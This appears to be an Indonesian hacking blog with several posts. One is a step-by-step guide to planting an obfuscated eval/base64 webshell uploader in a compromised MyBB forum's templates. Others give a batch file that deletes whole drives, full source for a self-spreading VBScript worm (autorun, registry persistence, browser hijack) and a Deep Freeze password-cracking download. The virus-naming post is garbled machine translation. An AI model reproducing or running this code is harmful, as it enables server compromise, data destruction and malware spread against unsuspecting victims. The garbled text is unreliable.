Daftar Blog Saya

Rabu, 20 Juli 2011

Upload Webshell via MyBB Control Panel

MyBB adalah aplikasi web berbasis PHP untuk forum/bulletin board. Sesuai dengan MyBB wiki, MyBB tidak mengizinkan sembarang code PHP pada templatenya:
“.. PHP is not parsed in templates. The only PHP values accepted are scalar and hash values such as {$myvalue} or {$myvalue['myhash']} ..”
Lalu, bagaimana cara menanam backdoor (upload webshell, file uploader, etc..) jika kita sudah menguasai Admin panelnya? Untungnya dokumentasi tersebut juga menyertakan clue yang bisa dimanfaatkan attacker untuk menanam backdoor. Ikuti panduan berikut ;)
  1. Login ke MyBB control panel dengan username dan password Administrator yang sudah Anda dapakan. Klik menu [Templates and Style]. Anda akan dibawa ke halaman Themes.
    {images: MyBB Themes}
    MyBB Themes
    Perhatikan kotak hijau di sebelah kanan nama theme. Kotak hijau tersebut menandakan bahwa theme tersebut sedang aktif.Klik menu [Templates] pada area navigasi kiri.
  2. Anda kini berada di halaman Template Sets. Karena pada halaman Themes tadi Theme yang aktif adalah Default, maka kini klik [Expand Templates] pada template yang memiliki keterangan “used by Default“.
    {image: Manage Template Sets}
    Manage Template Sets
  3. Kini ada beberapa template yang bisa Anda pilih untuk disisipi backdoor. Klik menu [Expand] milik Calendar Templates.
    {image: Manage Templates}
    Manage Templates
  4. Pada halaman rincian Calendar Templates, klik [Options] milik Calendar, kemudian pilih [Full Edit].
    {image: Edit calendar templates}
    Edit calendar templates
  5. Anda akan disuguhi halaman dengan code editor. Seperti yang sudah saya singgung di paragraf pertama artikel ini, MyBB tidak mengizikan sembarang code PHP. Jika Anda menulis code php pada halaman tersebut, code Anda akan ditampilkan apa adanya a.k.a tidak dijalankan. Untuk itu, silahkan menggunakan SPYROZONE.NET MyBB File Uploader. Salin code berikut, paste sebelum tag <html>
    {${eval(gzinflate(base64_decode('fZJPa9wwEMXvhXyH6VBwFhpr/1xCYntzaWgg0IVtTssSZHlsi9iSkMYpTsh3j3Yd0kBpThrxfvPeMNK6yNabnxsg1VpIsko/gux0Y3JUZJg8FpnuGyitr8jnOEcIXuXYMrsLIQJL1mqRBjd6+2QNpYZYtFI9aNNE1XrZkFjOFwsxX4p+LMt6SJ1pEP7oitscV6slQku6aTnHxeo8xpW+yGrre+iJW1vl6GxgBDKKR0c59kPH2knP4kCdVZLlYUjjBoaJqHVHCEb273XQT7Fenr+Dk3gce3CdlRW+9Yah7HWMe5TdEK93k1hkx7B4xAUVyeXJF12ffrvf/Nr+3iUfXJL97DkqV8q6MerXN7c/trvkMEOy3yXcu/tDcLL/Dqikaklg+g81EbPZ8/FJMCuL/0IpwpRLFYRBKQqhHrpu/JqJ8rhIvHyhLtBfq2sZDSpg+9YIn3h/MHmBdfwnrw==')))}}
    
    {image: Copy-Paste SPYROZONE.NET MyBB File Uploader}
    Copy-Paste SPYROZONE.NET MyBB File Uploader
    Klik [Save and Continue Editing] untuk menyimpan perubahan yang sudah Anda lakukan.
  6. Kini bukalah halaman utama forum, lalu pergilah ke halaman Calendar (victim.com/mybbfolder/calendar.php). SPYROZONE.NET MyBB File Uploader akan tampil diatas header forum ^^ Silahkan upload Webshell Anda mengunakan file uploader tersebut :D
    {image: Upload Backdoor}
    Upload Backdoor
    Jika upload berhasil dilakukan, file Anda akan tersimpan pada folder cache (victim.com/mybbfolder/cache/your-file.php).
Semoga bermanfaat ;)

Selasa, 19 Juli 2011

Virus Names

Sebuah nama virus umumnya diberikan oleh peneliti pertama yang menemukan binatang itu. Masalahnya adalah bahwa beberapa peneliti mungkin menghadapi virus baru secara paralel yang sering terjadi dalam beberapa nama.
Apa nama? Ketika datang ke virus itu masalah identifikasi untuk masyarakat umum. Program anti-virus tidak benar-benar membutuhkan nama virus seperti mengidentifikasi dengan karakteristiknya. Tapi, sementara memberikan virus nama membantu masyarakat luas juga berfungsi untuk membingungkan mereka sejak nama yang diberikan kepada binatang tertentu dapat berbeda dari pembuat anti-virus anti-virus pembuat.
Bagaimana? Mengapa? Sebanyak yang mereka ingin, penulis virus tidak mendapatkan nama binatang mereka. Beberapa telah mencoba dengan menempatkan teks yang jelas ke dalam virus tetapi sebagian besar anti-virus perusahaan cenderung mengabaikan teks tersebut (meskipun sebagian besar ke penulis virus). Dan, setiap penulis virus yang menekankan pada nama tertentu telah mengidentifikasi diri mereka dalam proses - sesuatu yang mereka biasanya tidak ingin lakukan. Jadi, anti-virus perusahaan mengontrol proses penamaan virus. Tapi, yang mengarah ke masalah penamaan.
Virus datang ke dalam berbagai anti-virus perusahaan di seluruh dunia pada berbagai waktu dan dengan berbagai cara. Setiap perusahaan analisis virus dan memberikan nama untuk itu untuk tujuan pelacakan. Meskipun ada kerjasama antara perusahaan ketika virus baru diidentifikasi, kerjasama yang sering mengambil kursi belakang untuk mendapatkan produk update keluar pintu sehingga pelanggan perusahaan anti-virus dilindungi. Keterlambatan ini memungkinkan nama alternatif untuk memasuki pasar. Seiring waktu ini sering standar atau, setidaknya, lintas-referensi dalam daftar, tetapi itu tidak membantu ketika binatang membuat penampilan pertama.
Ini masalah / kebingungan akan terus berlanjut. Salah satu contoh praktis dan didokumentasikan dengan baik bagaimana hal itu mempengaruhi daftar virus dunia nyata dapat dilihat di situs Wildlist pada halaman ...
http://www.wildlist.org/naming.htm
Salah satu usaha untuk membawa agar beberapa masalah penamaan Ian Whalley itu VGrep [pendaftaran diperlukan untuk melihat halaman]. VGrep upaya untuk mengumpulkan semua nama-nama berbagai virus dan kemudian berkorelasi mereka ke dalam daftar dicari tunggal. Sementara berguna, ada, lagi, jeda waktu yang diperlukan untuk mengumpulkan dan mengkorelasikan data.
Jadi, biasakan untuk virus memiliki nama yang berbeda. Seperti kata Shakespeare ...

    
Apa nama? Itu yang kita sebut mawar
    
Dengan nama lain akan bau manis ...
Upaya lain adalah database di VirusPool yang "... mencoba untuk menaruh informasi dari semua infeksi dikenal dan pencipta antivirus ke dalam satu tempat sehingga Anda dapat membandingkan nama-nama dan hasil." Saya berharap mereka yang terbaik dari keberuntungan.
Sebuah situs baru untuk mencoba untuk mengkorelasikan nama malware: CME - Enumerasi Malware umum. CME menyediakan tunggal, pengidentifikasi umum untuk ancaman virus baru untuk mengurangi kebingungan publik selama wabah malware. CME adalah bukan suatu usaha untuk memecahkan tantangan yang terlibat dengan skema penamaan untuk virus dan bentuk lain dari malware, melainkan bertujuan untuk memfasilitasi adopsi dari kemampuan, pengindeksan bersama netral untuk malware.
Akhirnya, beberapa vendor sebagian besar telah diberikan dengan penamaan malware tertentu dan beralih ke nama-nama generik untuk jenis malware (misalnya, Troj / Agen). Malware yang dihasilkan lebih cepat dari sistem penamaan cukup bisa mengikuti. Carilah ini mungkin terus berlanjut. Tentu saja, ini kemudian akan berarti perubahan pada metode khusus disinfeksi karena Anda tidak akan lagi dapat men-download disinfector khusus untuk binatang bernama. Waktu akan memberitahu bagaimana ini berkembang. Ringkasan

    
Virus penamaan adalah fungsi anti-virus perusahaan. Hal ini menyebabkan nama yang berbeda untuk virus baru.
    
Nama yang berbeda dapat menyebabkan kebingungan bagi perangkat lunak publik tapi tidak anti-virus yang terlihat pada virus, yang tidak "nama."
    
Ada situs yang berbeda yang mencoba untuk mengkorelasikan nama berbagai virus untuk Anda.

Membuat Virus mematikan dengan notepadThis is a featured page

Virus yang akan kita praketkkan ini adalah virus yang jauh lebih mematikan daripada virus-virus lainnya. Anda akan kaget dengan kegunaannya sebagai virus.

Let`s Begin!

1. buka notepad anda.
2. copy paste tulisan dibaah ini:

@echo off
DEL C: -Y
DEL D: -Y

untuk mendownload scrpt diatas, klik disini

3. ubah "type as file" ke "all files" dan save notepad dengan nama virus mematikan.bat
4. JANGAN DIKLIK!!!

Virus ini adalah virus yang sangat mematikan, bila anda mengklik virus ini, maka seluruh data yang ada di hardisk anda akan hilang tanpa terkecuali. Jadi, kesimpulannya..... Komputer anda akan mati total!!

Cara Membuat Virus Menggunakan Visual Basic (VB)



Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali. Virus yang akan kita coba buat kali ini akan dibuat dengan menggunakan Visual Basic Script. Terlebih dulu kira akan rencakan skenario kerja dari virus tersebut. Skenario virus tersebut adalah sebagai berikut:
1. Virus akan mencari file-file .JPG pada folder dan subfolder satu tingkat didalamnya, setelah itu merubah ekstension file JPG tersebut menjadi JPEG dan merubah atributnya menjadi hidden file. Sehingga akan dikira file tersebut terhapus.
2. Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows
3. Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat restart
4. Menularkan diri pada drive-drive yang aktif termasuk flash disk
5. Membuat halaman HTML tertentu agar dijalankan pada start page di Internet Explorer
Nah, demikianlah skenario virus yang akan kita buat. Untuk lebih jelasnya kita akan pelajari dari script dibawah ini:
1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya sesuai dengan skenario diatas
Sub serangan_jpg(target)
on error resume next
set ftarget=fso.GetFile(target)
set fsource = fso.GetFile(Wscript.ScriptFullName)
ftarget.Copy(Left(target,instrrev(target,”.”)) &amp; “jpeg”)
set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) &amp; “jpeg”)
fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”)) &amp; “jpg ” &amp; “.vbs”)
ftarget.Delete
ftarget.Close
fsource.Close
End Sub
Sub carifilejpg(folder)
For Each filetarget in fso.GetFolder(folder).Files
If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)
Next
End Sub
2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flash disk dan kemudian menularinya.
Sub serangan_drive()
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set Drives=fso.drives
adaflashdisk = False
For Each drive in Drives
If drive.isready Then
fsource.Copy(drive &amp; “” &amp; “wolio.vbs”)
If drive.DriveType = 1 And drive.DriveLetter &gt; “C:” Then adaflashdisk = True
End If
Next
If adaflashdisk = True Then
set fileautorun = fso.CreateTextFile(drive.DriveLetter &amp; “” &amp; “autorun.inf”,False)
fileautorun.WriteLine(”[AUTORUN]“)
fileautorun.WriteLine(”RUN=wolio.vbs”)
End If
End Sub
3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkan
Sub serangan_ie()
If (regedit.RegRead(”HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\Start
Page”)&lt;&gt;”c:\windows\system32\wolio.html”) Then
regedit.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start
Page”,”c:\windows\system32\wolio.html”
End If
End Sub
4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virus
Sub buat_html()
set filehtml = fso.CreateTextFile(”c:windowssystem32wolio.html”,True)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
“)
filehtml.WriteLine(”Welcome to Wolio”)
filehtml.WriteLine(”filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(”Selamat Datang di Wolio VBS “)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
End Sub
5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus
Sub serangan_folder(foldername)
on error resume next
For Each subfolder in fso.GetFolder(foldername).SubFolders
fsource.Copy(subfolder &amp; “wolio.vbs”)
carifilejpg(subfolder)
next
End Sub
6. Bagian dibawah ini adalah bagian yang utama gunanya untuk mendeklarasikan variabel dan memangggil semua prosedur
On Error Resume Next
dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,
filehtml, fileautorun
dim adaflashdisk
set fso = CreateObject(”Scripting.FileSystemObject”)
set fsource = fso.GetFile(Wscript.ScriptFullName)
set regedit=CreateObject(”WScript.Shell”)
myfolder = Left(fsource,InStrRev(fsource,””))
‘ Copy-kan diri ke “c:windowssystem32″
fsource.Copy(”c:windowssystem32wolio.vbs”)
‘ Cari dan infeksi file JPG didalam folder
carifilejpg(myfolder)
‘ Copy-kan diri di sub folder yang ada
serangan_folder(myfolder)
‘ Regitry
if
(regedit.RegRead(”HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\Version\Run\Wolio”)&lt;&gt;”c:\windows\system32\wolio.vbs”) Then
regedit.RegWrite
“HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\VersionRun\Wolio”,”c:\windows\system32\wolio.vbs”
End If
‘ Copy-kan diri ke semua drive aktif
serangan_drive()
‘ Buat file wolio.html
buat_html()
‘ Ubah Start Page di Internet Explorer
serangan_ie()
Demikianlah artikel tentang cara pembuatan dan penuluran sebuah virus yang dibuat dengan VBS. Setelah mengetahui teknik penyebaran suatu virus yang dibuat dengan VBS, maka diharapkan kepada Anda agar dapat melakukan pencegahan. Virus yang kita pelajari kali ini sebenarnya hanya virus yang “KONYOL”, ini hanya membuka wacana Anda terhadap bahaya dari virus yang dibuat dengan VBS. Semoga artikel ini dapat bermanfaat.
Source: c o k e l a t n e t[dot]b l  o g s p o t[dot] c o m
Silakan Ber Eksperimen Dengan Ide-Ide yang lain, Cheers..
Jangan lupa untuk sharing kepada yang lain ya :)

Jebol Deep Freeze V.7 (All Version)

Akhirnya pencarian panjang pun berakhir sudah. Kenapa saya katakan demikian? Ya, karena selama ini saya mencoba cari kesana kemari, muter-muter tujuh keliling tapi tidak ketemu dengan yang namanya Anti Deep Freeze.


Tapi perlu saya tegaskan di sini bahwa, postingan ini hanya untuk pembelajaran saja. Bagi yang merasa dirugikan dengan postingan ini, saya tidak tanggung jawab, karena ini hanya sekedar sharing saja. Buat teman-teman pemabaca, mohon untuk tidak disalahgunakan.

Baik, saya rasa sudah cukup basa-basinya. Kita langsung saja ke topik.
Tidak perlu lagi dijelaskan apa itu Deep Freeze, kegunaanya, dan lainnya. Demikian juga dengan Anti Deep Freeze berikut yang akan saya bagikan kepada anda, baik cara pakainya, maupun jenis-jenisnya. Terakhir saya mencoba menjebol password Deep Freeze versi 7.10.020.3176 dan hasilnya cukup memuaskan. Nah ini sebagai peringatan kepada admin warnet (karena hampir semua wanet memasang Deep Freeze ini) untuk tetap waspada.
Download Hire